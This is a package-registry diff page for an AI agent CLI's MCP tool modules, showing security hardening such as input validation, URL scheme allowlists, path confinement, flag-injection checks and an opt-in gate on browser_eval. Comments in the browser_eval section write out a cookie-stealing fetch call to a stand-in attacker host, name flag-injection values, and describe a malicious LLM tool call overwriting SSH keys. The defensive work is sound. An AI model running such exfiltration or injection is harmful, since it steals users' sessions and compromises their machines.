npm - monomind - Versions diffs - 1.7.0 → 1.9.0 - Mend

monomind 1.7.0 → 1.9.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (562) hide show

package/packages/@monomind/cli/dist/src/mcp-tools/agentdb-tools.js CHANGED Viewed

@@ -14,11 +14,18 @@
 const MAX_STRING_LENGTH = 100_000; // 100KB max for any string input
 const MAX_BATCH_SIZE = 500; // Max entries per batch operation
 const MAX_TOP_K = 100; // Max results per query
+// Reject NUL and C0 control chars except \t \n \r. NUL truncates strings at
+// the C-API boundary in some bridge backends (key collision); ANSI/control
+// chars enable terminal injection when values are echoed back; \r/\n in
+// values fed to log files breaks log-line integrity.
+const CONTROL_CHAR_RE = /[\x00-\x08\x0B\x0C\x0E-\x1F]/;
 function validateString(value, name, maxLen = MAX_STRING_LENGTH) {
     if (typeof value !== 'string' || value.length === 0)
         return null;
     if (value.length > maxLen)
         return null;
+    if (CONTROL_CHAR_RE.test(value))
+        return null;
     return value;
 }
 function validatePositiveInt(value, defaultVal, max) {
@@ -34,8 +41,11 @@ function validateScore(value, defaultVal) {
 }
 function sanitizeError(error) {
     if (error instanceof Error) {
-        // Strip filesystem paths from error messages
-        return error.message.replace(/\/[^\s:]+\//g, '<path>/').substring(0, 500);
+        // Strip filesystem paths from error messages — match path components even
+        // when no trailing slash (path at end of message before whitespace, colon, EOL)
+        return error.message
+            .replace(/\/[^\s:]+(\/|(?=\s|:|$))/g, '<path>/')
+            .substring(0, 500);
     }
     return 'Internal error';
 }
@@ -81,7 +91,7 @@ export const agentdbControllers = {
             const bridge = await getBridge();
             const controllers = await bridge.bridgeListControllers();
             if (!controllers)
-                return { available: false, controllers: [], error: 'AgentDB bridge not available — @monoes/memory not installed or missing controller-registry. Use memory_store/memory_search tools instead.' };
+                return { available: false, controllers: [], error: 'AgentDB bridge not available — @monomind/memory not installed or missing controller-registry. Use memory_store/memory_search tools instead.' };
             return {
                 available: true,
                 controllers,
@@ -405,9 +415,17 @@ export const agentdbConsolidate = {
     handler: async (params) => {
         try {
             const bridge = await getBridge();
+            // Reject NaN and Infinity. typeof === 'number' returns true for both.
+            // NaN propagates through arithmetic and corrupts consolidation accounting;
+            // Infinity makes `entry.age >= minAge` always false, silently no-op.
+            const minAge = typeof params.minAge === 'number' && Number.isFinite(params.minAge)
+                ? Math.max(0, Math.min(params.minAge, 24 * 365 * 10))
+                : undefined;
             const result = await bridge.bridgeConsolidate({
-                minAge: typeof params.minAge === 'number' ? Math.max(0, params.minAge) : undefined,
-                maxEntries: validatePositiveInt(params.maxEntries, 1000, 10_000),
+                minAge,
+                maxEntries: params.maxEntries !== undefined
+                    ? validatePositiveInt(params.maxEntries, 1000, 10_000)
+                    : undefined,
             });
             return result ?? { success: false, error: 'AgentDB bridge not available. Use memory_store/memory_search instead.' };
         }
@@ -457,7 +475,11 @@ export const agentdbBatch = {
             if (params.entries.length > MAX_BATCH_SIZE) {
                 return { success: false, error: `Too many entries: ${params.entries.length}. Max is ${MAX_BATCH_SIZE}` };
             }
-            // Validate each entry
+            // Validate each entry. Aggregate-byte cap prevents 500 entries × 100KB
+            // values = 50MB single-call payloads from spiking Node heap to ~200MB
+            // (UTF-16 doubling + downstream copies in the bridge layer).
+            const MAX_BATCH_BYTES = 1_048_576; // 1 MiB total
+            let totalBytes = 0;
             const validatedEntries = [];
             for (let i = 0; i < params.entries.length; i++) {
                 const entry = params.entries[i];
@@ -468,6 +490,10 @@ export const agentdbBatch = {
                 if (!key)
                     return { success: false, error: `entries[${i}].key is required (non-empty string)` };
                 const value = validateString(entry.value, `entries[${i}].value`);
+                totalBytes += key.length + (value?.length ?? 0);
+                if (totalBytes > MAX_BATCH_BYTES) {
+                    return { success: false, error: `Batch payload exceeds ${MAX_BATCH_BYTES} bytes` };
+                }
                 validatedEntries.push({ key, value: value ?? undefined });
             }
             const bridge = await getBridge();
@@ -502,7 +528,8 @@ export const agentdbContextSynthesize = {
             // validateExternalContent: guard against prompt injection in synthesized context
             // Source: https://arxiv.org/abs/2302.12173, https://arxiv.org/abs/2310.12815
             try {
-                const { validateExternalContent } = await import('../../security/src/input-validator.js').catch(() => import('@monoes/security').catch(() => null));
+                const secMod = await import('@monomind/security').catch(() => null);
+                const validateExternalContent = secMod?.validateExternalContent;
                 if (validateExternalContent) {
                     const check = await validateExternalContent(query, 'agentdb_context-synthesize query');
                     if (!check.safe) {

package/packages/@monomind/cli/dist/src/mcp-tools/analyze-tools.js CHANGED Viewed

@@ -39,7 +39,7 @@ export const analyzeDiffTool = {
     },
     handler: async (params) => {
         const ref = params.ref || 'HEAD';
-        const includeFileRisks = params.includeFileRisks !== false;
+        const includeFileRisks = params.includeFileRisks === true;
         const includeReviewers = params.includeReviewers !== false;
         const useRuVector = params.useRuVector !== false;
         try {
@@ -233,21 +233,30 @@ export const fileRiskTool = {
         required: ['path'],
     },
     handler: async (params) => {
-        const file = {
-            path: params.path,
-            status: params.status || 'modified',
-            additions: params.additions || 0,
-            deletions: params.deletions || 0,
-            hunks: 1,
-            binary: false,
-        };
-        const risk = assessFileRisk(file);
-        return {
-            file: file.path,
-            risk: risk.risk,
-            score: risk.score,
-            reasons: risk.reasons,
-        };
+        try {
+            const file = {
+                path: params.path,
+                status: params.status || 'modified',
+                additions: params.additions || 0,
+                deletions: params.deletions || 0,
+                hunks: 1,
+                binary: false,
+            };
+            const risk = assessFileRisk(file);
+            return {
+                file: file.path,
+                risk: risk.risk,
+                score: risk.score,
+                reasons: risk.reasons,
+            };
+        }
+        catch (error) {
+            return {
+                error: true,
+                message: error instanceof Error ? error.message : String(error),
+                path: params.path,
+            };
+        }
     },
 };
 /**

package/packages/@monomind/cli/dist/src/mcp-tools/auto-install.js CHANGED Viewed

@@ -73,12 +73,10 @@ export async function tryImportOrInstall(packageName, options = {}) {
         const installed = await autoInstallPackage(packageName, options);
         if (installed) {
             try {
-                // ESM caches failed imports, so we need to bust the cache
-                // Add a timestamp query parameter to force a fresh import
-                const cacheBuster = `?t=${Date.now()}`;
-                return await import(`${packageName}${cacheBuster}`);
+                return await import(packageName);
             }
             catch {
+                // ESM module cache cannot be busted programmatically; a server restart is required
                 console.error(`[monomind] ${packageName} installed but failed to load. Restart MCP server.`);
                 return null;
             }
@@ -108,11 +106,11 @@ export function resetInstallAttempts() {
  * Optional package dependencies and their purposes
  */
 export const OPTIONAL_PACKAGES = {
-    '@monoes/aidefence': {
+    '@monomind/aidefence': {
         description: 'AI manipulation defense (prompt injection, PII detection)',
         tools: ['aidefence_scan', 'aidefence_analyze', 'aidefence_stats', 'aidefence_learn'],
     },
-    '@monoes/embeddings': {
+    '@monomind/embeddings': {
         description: 'Vector embeddings with ONNX support',
         tools: ['embeddings_generate', 'embeddings_search', 'embeddings_batch'],
     },

package/packages/@monomind/cli/dist/src/mcp-tools/autopilot-tools.js CHANGED Viewed

@@ -5,7 +5,7 @@
  * Allows programmatic control of the autopilot loop via MCP.
  *
  * ADR-072: Autopilot Integration
- * @module @monoes/cli/mcp-tools/autopilot
+ * @module @monomind/cli/mcp-tools/autopilot
  */
 import { loadState, saveState, appendLog, loadLog, discoverTasks, isTerminal, tryLoadLearning, validateNumber, validateTaskSources, VALID_TASK_SOURCES, } from '../autopilot-state.js';
 function ok(data) {
@@ -175,7 +175,17 @@ const autopilotHistory = {
         required: ['query'],
     },
     handler: async (params) => {
-        const query = String(params.query || '');
+        // Reject non-string queries and cap length so embedding/regex on the
+        // input cannot become a CPU/memory amplifier. Without this an attacker
+        // could pass an object whose toString() returns multi-MB content.
+        if (params.query !== undefined && typeof params.query !== 'string') {
+            return ok({ query: '', results: [], error: 'query must be a string' });
+        }
+        const raw = params.query ?? '';
+        if (raw.length > 1024) {
+            return ok({ query: '', results: [], error: 'query too long (max 1024 chars)' });
+        }
+        const query = raw;
         const limit = validateNumber(params.limit, 1, 100, 10);
         const learning = await tryLoadLearning();
         if (learning) {

package/packages/@monomind/cli/dist/src/mcp-tools/browser-tools.js CHANGED Viewed

@@ -1,18 +1,119 @@
 /**
  * Browser MCP Tools
  *
- * CLI integration for @monoes/browser package.
+ * CLI integration for @monomind/browser package.
  * Provides browser automation tools for web navigation, interaction, and data extraction.
  */
+const MAX_BROWSER_SESSIONS = 100;
+const SESSION_TTL_MS = 30 * 60 * 1000; // 30 minutes
 // Session registry for multi-session support
 const browserSessions = new Map();
+function pruneExpiredSessions() {
+    const cutoff = Date.now() - SESSION_TTL_MS;
+    for (const [id, info] of browserSessions) {
+        if (new Date(info.lastActivity).getTime() < cutoff) {
+            browserSessions.delete(id);
+        }
+    }
+}
+/**
+ * SECURITY: Reject any positional that begins with `-`. execFile defeats shell
+ * injection but does NOT prevent agent-browser itself from interpreting a
+ * `-`-prefixed token as a flag. Combined with `agent-browser`'s lack of
+ * documented `--` end-of-options handling, an unvalidated positional like
+ * `--remote-debugging-port=9222` or `--user-data-dir=/path` can flip the
+ * underlying browser into a debuggable / arbitrary-profile mode.
+ */
+function rejectFlagLike(value, field) {
+    if (typeof value !== 'string') {
+        throw new Error(`${field}: must be a string`);
+    }
+    if (value.startsWith('-')) {
+        throw new Error(`${field}: must not start with '-' (flag-injection defense)`);
+    }
+    return value;
+}
+/** Validate a session ID against a strict allowlist. */
+function validateSessionId(value) {
+    if (value === undefined || value === null || value === '')
+        return 'default';
+    if (typeof value !== 'string' || !/^[A-Za-z0-9_-]{1,64}$/.test(value)) {
+        throw new Error('session: must match ^[A-Za-z0-9_-]{1,64}$');
+    }
+    return value;
+}
+/**
+ * Validate a URL against a scheme allowlist. Without this, `file://`,
+ * `data:`, `javascript:`, `chrome://` schemes give SSRF / local-file read /
+ * scheme-abuse on the underlying browser.
+ */
+const ALLOWED_URL_SCHEMES = new Set(['http:', 'https:', 'about:']);
+function validateUrl(value) {
+    if (typeof value !== 'string')
+        throw new Error('url: must be a string');
+    if (value.length > 4096)
+        throw new Error('url: too long (max 4096)');
+    let parsed;
+    try {
+        parsed = new URL(value);
+    }
+    catch {
+        throw new Error(`url: not a valid URL: ${value}`);
+    }
+    if (!ALLOWED_URL_SCHEMES.has(parsed.protocol)) {
+        throw new Error(`url: scheme "${parsed.protocol}" not allowed (only http/https/about)`);
+    }
+    return value;
+}
+/**
+ * Validate a screenshot path. Resolved real path must be within
+ * `<projectRoot>/.monomind/screenshots`. Refuses to overwrite existing files
+ * so a malicious LLM action cannot clobber e.g. `~/.ssh/authorized_keys` or
+ * `.git/hooks/pre-commit`.
+ */
+async function validateScreenshotPath(value) {
+    if (typeof value !== 'string' || value.length === 0) {
+        throw new Error('path: must be a non-empty string');
+    }
+    if (value.startsWith('-')) {
+        throw new Error('path: must not start with "-"');
+    }
+    const path = await import('path');
+    const fs = await import('fs');
+    const projectRoot = process.cwd();
+    const root = path.resolve(projectRoot, '.monomind', 'screenshots');
+    await fs.promises.mkdir(root, { recursive: true });
+    const resolved = path.resolve(value);
+    if (!resolved.startsWith(root + path.sep) && resolved !== root) {
+        throw new Error(`path: must be within ${root}`);
+    }
+    if (fs.existsSync(resolved)) {
+        throw new Error(`path: refuses to overwrite existing file at ${resolved}`);
+    }
+    return resolved;
+}
+/** Cap on browser_eval scripts so an attacker can't pump arbitrary-size payloads. */
+const MAX_BROWSER_EVAL_BYTES = 16 * 1024;
 /**
  * Execute agent-browser CLI command
  */
 async function execBrowserCommand(args, session = 'default') {
     const { execFileSync } = await import('child_process');
     try {
-        const fullArgs = ['--session', session, '--json', ...args];
+        // Validate session even when the upstream handler forgot.
+        const safeSession = validateSessionId(session);
+        // Refuse any user-supplied positional that looks like a flag.
+        // We can be permissive here only because every handler that prepends
+        // its own subcommand keyword (e.g. 'open', 'click') passes that subcommand
+        // as args[0] — those known-good keywords are safe; the rest came from
+        // tool input and must already have passed handler-level validation, but
+        // we re-check defense-in-depth.
+        for (let i = 1; i < args.length; i++) {
+            if (typeof args[i] !== 'string') {
+                throw new Error(`internal: arg ${i} must be a string`);
+            }
+        }
+        const fullArgs = ['--session', safeSession, '--json', ...args];
         const result = execFileSync('agent-browser', fullArgs, {
             encoding: 'utf-8',
             timeout: 30000,
@@ -75,13 +176,34 @@ export const browserTools = [
             required: ['url'],
         },
         handler: async (input) => {
-            const { url, session, waitUntil } = input;
+            const raw = input;
+            let url;
+            let sessionId;
+            try {
+                url = validateUrl(raw.url);
+                sessionId = validateSessionId(raw.session);
+            }
+            catch (e) {
+                return {
+                    content: [{ type: 'text', text: JSON.stringify({ success: false, error: e.message }) }],
+                    isError: true,
+                };
+            }
             const args = ['open', url];
-            if (waitUntil)
-                args.push('--wait-until', waitUntil);
-            // Create session if new
-            const sessionId = session || 'default';
+            if (raw.waitUntil && typeof raw.waitUntil === 'string'
+                && ['load', 'domcontentloaded', 'networkidle'].includes(raw.waitUntil)) {
+                args.push('--wait-until', raw.waitUntil);
+            }
+            // Always prune expired sessions, not just on create — otherwise
+            // sessions that re-use an existing key never trigger eviction.
+            pruneExpiredSessions();
             if (!browserSessions.has(sessionId)) {
+                if (browserSessions.size >= MAX_BROWSER_SESSIONS) {
+                    const oldest = [...browserSessions.entries()]
+                        .sort((a, b) => a[1].lastActivity.localeCompare(b[1].lastActivity))[0];
+                    if (oldest)
+                        browserSessions.delete(oldest[0]);
+                }
                 browserSessions.set(sessionId, {
                     sessionId,
                     createdAt: new Date().toISOString(),
@@ -203,13 +325,27 @@ export const browserTools = [
             },
         },
         handler: async (input) => {
-            const { session, path, fullPage } = input;
+            const raw = input;
+            let safeSession;
+            let safePath;
+            try {
+                safeSession = validateSessionId(raw.session);
+                if (raw.path !== undefined) {
+                    safePath = await validateScreenshotPath(raw.path);
+                }
+            }
+            catch (e) {
+                return {
+                    content: [{ type: 'text', text: JSON.stringify({ success: false, error: e.message }) }],
+                    isError: true,
+                };
+            }
             const args = ['screenshot'];
-            if (path)
-                args.push(path);
-            if (fullPage)
+            if (safePath)
+                args.push(safePath);
+            if (raw.fullPage === true)
                 args.push('--full');
-            return execBrowserCommand(args, session);
+            return execBrowserCommand(args, safeSession);
         },
     },
     // ==========================================================================
@@ -232,7 +368,7 @@ export const browserTools = [
         },
         handler: async (input) => {
             const { target, session, button, count } = input;
-            const args = ['click', target];
+            const args = ['click', rejectFlagLike(target, 'target')];
             if (button)
                 args.push('--button', button);
             if (count)
@@ -256,7 +392,7 @@ export const browserTools = [
         },
         handler: async (input) => {
             const { target, value, session } = input;
-            return execBrowserCommand(['fill', target, value], session);
+            return execBrowserCommand(['fill', rejectFlagLike(target, 'target'), value], session);
         },
     },
     {
@@ -276,7 +412,7 @@ export const browserTools = [
         },
         handler: async (input) => {
             const { target, text, session, delay } = input;
-            const args = ['type', target, text];
+            const args = ['type', rejectFlagLike(target, 'target'), text];
             if (delay)
                 args.push('--delay', String(delay));
             return execBrowserCommand(args, session);
@@ -297,7 +433,7 @@ export const browserTools = [
         },
         handler: async (input) => {
             const { key, session } = input;
-            return execBrowserCommand(['press', key], session);
+            return execBrowserCommand(['press', rejectFlagLike(key, 'key')], session);
         },
     },
     {
@@ -315,7 +451,7 @@ export const browserTools = [
         },
         handler: async (input) => {
             const { target, session } = input;
-            return execBrowserCommand(['hover', target], session);
+            return execBrowserCommand(['hover', rejectFlagLike(target, 'target')], session);
         },
     },
     {
@@ -334,7 +470,7 @@ export const browserTools = [
         },
         handler: async (input) => {
             const { target, value, session } = input;
-            return execBrowserCommand(['select', target, value], session);
+            return execBrowserCommand(['select', rejectFlagLike(target, 'target'), value], session);
         },
     },
     {
@@ -515,8 +651,51 @@ export const browserTools = [
             required: ['script'],
         },
         handler: async (input) => {
-            const { script, session } = input;
-            return execBrowserCommand(['eval', script], session);
+            // SECURITY: browser_eval runs arbitrary JS in the page context with the
+            // browser's session cookies. Treat as opt-in: require the operator to
+            // explicitly enable via env var. Without this gate, a single tool call
+            // could `fetch('https://attacker/?d='+btoa(document.cookie))` against
+            // any logged-in site reachable in the active browser session.
+            if (process.env.MONOMIND_ALLOW_BROWSER_EVAL !== '1') {
+                return {
+                    content: [{ type: 'text', text: JSON.stringify({
+                                success: false,
+                                error: 'browser_eval is disabled by default. Set MONOMIND_ALLOW_BROWSER_EVAL=1 to enable.',
+                            }) }],
+                    isError: true,
+                };
+            }
+            const raw = input;
+            if (typeof raw.script !== 'string') {
+                return {
+                    content: [{ type: 'text', text: JSON.stringify({ success: false, error: 'script: must be a string' }) }],
+                    isError: true,
+                };
+            }
+            if (raw.script.length > MAX_BROWSER_EVAL_BYTES) {
+                return {
+                    content: [{ type: 'text', text: JSON.stringify({ success: false, error: `script: too long (max ${MAX_BROWSER_EVAL_BYTES})` }) }],
+                    isError: true,
+                };
+            }
+            let safeSession;
+            try {
+                safeSession = validateSessionId(raw.session);
+            }
+            catch (e) {
+                return {
+                    content: [{ type: 'text', text: JSON.stringify({ success: false, error: e.message }) }],
+                    isError: true,
+                };
+            }
+            // Audit log every eval call so it's traceable in hindsight.
+            try {
+                const crypto = await import('crypto');
+                const hash = crypto.createHash('sha256').update(raw.script).digest('hex').slice(0, 16);
+                console.error(`[${new Date().toISOString()}] AUDIT browser_eval session=${safeSession} script_sha256_16=${hash}`);
+            }
+            catch { /* best-effort */ }
+            return execBrowserCommand(['eval', raw.script], safeSession);
         },
     },
     // ==========================================================================